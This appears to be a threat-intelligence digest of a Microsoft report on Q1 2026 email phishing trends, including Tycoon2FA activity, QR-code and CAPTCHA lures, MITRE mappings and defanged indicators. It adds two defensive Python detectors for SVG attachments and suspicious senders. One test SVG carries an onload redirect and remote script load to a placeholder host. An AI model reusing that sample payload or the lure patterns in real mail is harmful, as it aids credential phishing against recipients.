Email threat landscape: Q1 2026 trends and insights

Microsoft observed Q1 2026 email threat activity dominated by a surge in QR-code and CAPTCHA‑gated phishing, widespread credential-harvesting payloads, and persistent BEC activity totaling about 10.7 million attacks. Disruption of the Tycoon2FA PhaaS in early March reduced access to active phishing pages and email volumes temporarily, though the actor adapted by changing hosting providers and TLD registration patterns. #Tycoon2FA #Storm-1747

Key points

  • Microsoft’s disruption of Tycoon2FA in early March sharply reduced phishing page availability and contributed to a 15% drop in Tycoon2FA‑linked messages for March.
  • QR code phishing surged 146% across Q1 2026 (7.6M → 18.7M), with PDF attachments the dominant delivery method and email‑embedded QR codes growing rapidly.
  • CAPTCHA‑gated phishing more than doubled in March (+125%) to 11.9M attacks as adversaries used fake CAPTCHAs to evade automated scanning and increase user interaction.
  • Malicious payloads were overwhelmingly credential phishing (≈94% by March), with volatile use of HTML, PDF, SVG, DOC/DOCX, and compressed attachments to deliver content.
  • Large, concentrated campaigns (multi‑million messages) abused varied PhaaS providers—Tycoon2FA, Kratos, and EvilTokens—to host final phishing payloads and staging pages.
  • BEC remained prevalent (≈10.7M attacks in Q1), dominated by low-effort generic outreach messages (82–84%), with transactional pretexts and occasional seasonal shifts in financial request types.
  • Tycoon2FA infrastructure trends shifted across Q1: new generic TLDs in January/February, then a post‑disruption increase in .RU registrations and migration away from Cloudflare hosting.

MITRE Techniques

  • [T1557] Adversary-in-the-middle – Used to defeat non-phishing-resistant MFA by mediating sign-in flows in phishing kits; quote (‘leveraging adversary-in-the-middle (AiTM) techniques to attempt to defeat non-phishing-resistant multifactor authentication (MFA) defenses.’)
  • [T1566] Phishing – Broad email-based credential harvesting campaigns using attachments, embedded QR codes, and staged landing pages; quote (‘QR codes have rapidly emerged as a preferred tool among phishing threat actors seeking to bypass traditional email defenses.’)
  • [T1566.001] Phishing Attachment – Delivery of malicious HTML, PDF, SVG, DOC/DOCX, and ZIP attachments that launch local redirectors or staged pages; quote (‘PDF attachments were the dominant delivery method throughout the quarter, growing from 65% of QR code attacks in January to 70% in March.’)
  • [T1566.002] Phishing Link – Use of embedded URLs and QR codes in email bodies to redirect users to phishing sites and bypass text-based scanning; quote (‘emergence of QR codes embedded directly in email bodies, which surged 336% in March.’)
  • [T1204] User Execution – Reliance on user actions (opening attachments, completing fake CAPTCHAs) to trigger payload retrieval and credential capture; quote (‘If an attached SVG file was opened, the user’s browser would open locally and fetch content from one of the three following hostnames’).
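The SVG technique quoted under T1204 works because an SVG opened locally in a browser is a live XML document: it can carry script, event handlers and external references that fetch the real phishing page. The following is an added example (not code from the Microsoft report) of a defender-side triage check: it parses an SVG attachment with the standard library, never fetches anything, and reports the elements, event handlers and external hostnames that a static image should not contain. The two SVG samples and the hostname staging.example.invalid are constructed for this example and are not indicators from the page.

```python
import re
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

# Constructed sample: an SVG that would fetch content from an external host when
# opened in a browser. The hostname is a placeholder, not an IoC from the report.
SAMPLE_SVG = b"""<?xml version="1.0"?>
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"
     width="400" height="300" onload="location.href='https://staging.example.invalid/c'">
  <script href="https://staging.example.invalid/loader.js"></script>
  <image xlink:href="https://staging.example.invalid/qr.png" width="200" height="200"/>
  <text x="10" y="20">PLAY AUDIO MESSAGE</text>
</svg>"""

# Constructed benign sample: a plain vector shape with no active content.
BENIGN_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg" width="10" height="10">
  <circle cx="5" cy="5" r="4" fill="blue"/>
</svg>"""

# Elements that give an SVG behaviour beyond drawing (scripting, embedding, animation).
ACTIVE_TAGS = {"script", "foreignObject", "iframe", "embed", "object", "use", "set", "animate"}
URL_RE = re.compile(r"https?://[^\s'\"()]+", re.IGNORECASE)


def local_name(tag):
    """Strip the XML namespace prefix, e.g. '{http://www.w3.org/1999/xlink}href' -> 'href'."""
    return tag.rsplit("}", 1)[-1]


def analyze_svg(data):
    """Statically inspect SVG bytes and return findings, external hosts and a verdict.

    Nothing is rendered or fetched; the check only walks the parsed XML tree.
    """
    findings, hosts = [], set()
    try:
        root = ET.fromstring(data)
    except ET.ParseError as exc:
        # Malformed XML still reaches the user's browser, which is lenient; treat as suspicious.
        return {"findings": [f"unparseable SVG: {exc}"], "hosts": [], "suspicious": True}

    for el in root.iter():
        name = local_name(el.tag)
        if name in ACTIVE_TAGS:
            findings.append(f"<{name}> element present")
        for attr, value in el.attrib.items():
            aname = local_name(attr)
            if aname.lower().startswith("on"):
                # onload/onclick/... handlers run script as soon as the file is opened.
                findings.append(f"event handler {aname} on <{name}>")
            for url in URL_RE.findall(value):
                host = urlparse(url).hostname
                if host:
                    hosts.add(host.lower())
                    if aname == "href":
                        # href / xlink:href pointing off-host is the "fetch content from
                        # a remote hostname" behaviour described in the report.
                        findings.append(f"external reference on <{name}> {aname}: {host}")

    return {"findings": findings, "hosts": sorted(hosts), "suspicious": bool(findings)}


if __name__ == "__main__":
    for label, blob in (("sample", SAMPLE_SVG), ("benign", BENIGN_SVG)):
        result = analyze_svg(blob)
        print(label, "suspicious" if result["suspicious"] else "clean", result["hosts"])
        for finding in result["findings"]:
            print("   ", finding)
```

The `hosts` list is what you would feed to reputation lookups or compare against the hostnames in the Indicators of Compromise section; the `findings` list explains why a given attachment was held, which is what an analyst needs when a user asks why their "audio message" did not arrive.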

Indicators of Compromise

  • [Domain / Hostname] phishing hosting and staging – bouleversement.niovapahrm[.]com, haematogenesis.hvishay[.]com, and 1 more host used to serve CAPTCHA and staging pages.
  • [File name] malicious SVG attachment patterns – _statements_inv_.svg; PLAY_AUDIO_MESSAGE____241.svg (used in a 1.2M‑message campaign).
  • [Top-level domain] registration patterns linked to Tycoon2FA infrastructure – .DIGITAL (newer TLD usage), and .RU (over 41% of Tycoon2FA domains since late March).
  • [Email sender usernames] suspicious long, keyword‑stuffed senders used in HTML campaign delivery – eReceipt_Payment_Alert_Noreply-/m939k6d7.r.us-west-2.awstrack.me/…, DocExchange_Noreply-m939k6d7.r.us_west_2.awstrack.me/… (examples of embedded URLs/tracking in sender strings).
  • [Attachment file types] malicious payload delivery formats – HTML attachments, PDF attachments (dominant for QR/CAPTCHA campaigns), and SVG files used to fetch phishing content.
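The sender-username and file-name indicators above are patterns rather than exact-match IoCs: long, keyword-stuffed local parts with a hostname embedded in them, and active-content attachments with underscore-padded lure names. The following is an added example (not code from the Microsoft report) of turning those patterns into a scoring check over a parsed message. The sender address, the benign message and the weights are constructed for this example; the two SVG file names are the ones reported on the page, and the example generalizes slightly by also treating HTML attachments as active content, as the report describes HTML attachment campaigns too.

```python
import re
from email.utils import parseaddr

# Heuristic weights are constructed for this example, not a published rule set.
ACTIVE_EXTENSIONS = {"svg", "html", "htm", "shtml"}
LURE_WORDS = {"noreply", "payment", "alert", "receipt", "invoice", "docexchange",
              "statement", "audio", "voice", "message"}
# A dotted multi-label name inside the local part, e.g. a tracking hostname stuffed
# before the "@" the way the report's sender strings do.
HOSTNAME_IN_LOCAL_RE = re.compile(r"[a-z0-9-]+(?:\.[a-z0-9-]+)+\.[a-z]{2,}", re.I)
FLAG_THRESHOLD = 3

# Constructed sample mimicking the report's sender pattern; the domains are placeholders.
SUSPICIOUS = {
    "from": '"eReceipt" <eReceipt_Payment_Alert_Noreply-track.r.us-west-2.example.invalid@mail.example.invalid>',
    "attachments": ["PLAY_AUDIO_MESSAGE____241.svg"],  # file name reported on the page
}
# Constructed benign message for comparison.
BENIGN = {"from": "Accounts <billing@vendor.example.invalid>",
          "attachments": ["invoice_2026_03.pdf"]}


def sender_indicators(from_header):
    """Return (reason, weight) pairs for the address local part of a From header."""
    _, addr = parseaddr(from_header)
    local = addr.rsplit("@", 1)[0] if "@" in addr else addr
    reasons = []
    if len(local) > 40:
        reasons.append((f"long local part ({len(local)} chars)", 1))
    m = HOSTNAME_IN_LOCAL_RE.search(local)
    if m:
        reasons.append((f"hostname embedded in local part: {m.group(0)}", 2))
    hits = {w for w in LURE_WORDS if w in local.lower()}
    if len(hits) >= 3:
        reasons.append((f"keyword-stuffed local part: {', '.join(sorted(hits))}", 1))
    return reasons


def attachment_indicators(filename):
    """Return (reason, weight) pairs for one attachment file name."""
    stem, _, ext = filename.rpartition(".")
    if not stem:  # no extension at all
        stem, ext = filename, ""
    ext = ext.lower()
    reasons = []
    if ext in ACTIVE_EXTENSIONS:
        reasons.append((f"active-content attachment .{ext}: {filename}", 2))
    if re.search(r"_{3,}", stem) or (stem.startswith("_") and stem.endswith("_")):
        reasons.append((f"underscore-padded file name: {filename}", 1))
    lure = {w for w in LURE_WORDS if w in stem.lower()}
    if lure and ext in ACTIVE_EXTENSIONS:
        reasons.append((f"lure words in active attachment name: {', '.join(sorted(lure))}", 1))
    return reasons


def triage(from_header, attachments):
    """Combine sender and attachment indicators into a score and a flag decision."""
    reasons = sender_indicators(from_header)
    for name in attachments:
        reasons.extend(attachment_indicators(name))
    score = sum(weight for _, weight in reasons)
    return {"score": score, "flagged": score >= FLAG_THRESHOLD,
            "reasons": [reason for reason, _ in reasons]}


if __name__ == "__main__":
    for msg in (SUSPICIOUS, BENIGN):
        verdict = triage(msg["from"], msg["attachments"])
        print(msg["from"], "->", "FLAG" if verdict["flagged"] else "pass", verdict["score"])
        for reason in verdict["reasons"]:
            print("   ", reason)
```

Each indicator on its own is weak (a legitimate "first.last.jr" local part trips the hostname regex), which is why the check sums weights and reports every reason rather than blocking on a single match; the threshold is the knob to tune against your own mail flow.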


Read more: https://www.microsoft.com/en-us/security/blog/2026/04/30/email-threat-landscape-q1-2026-trends-and-insights/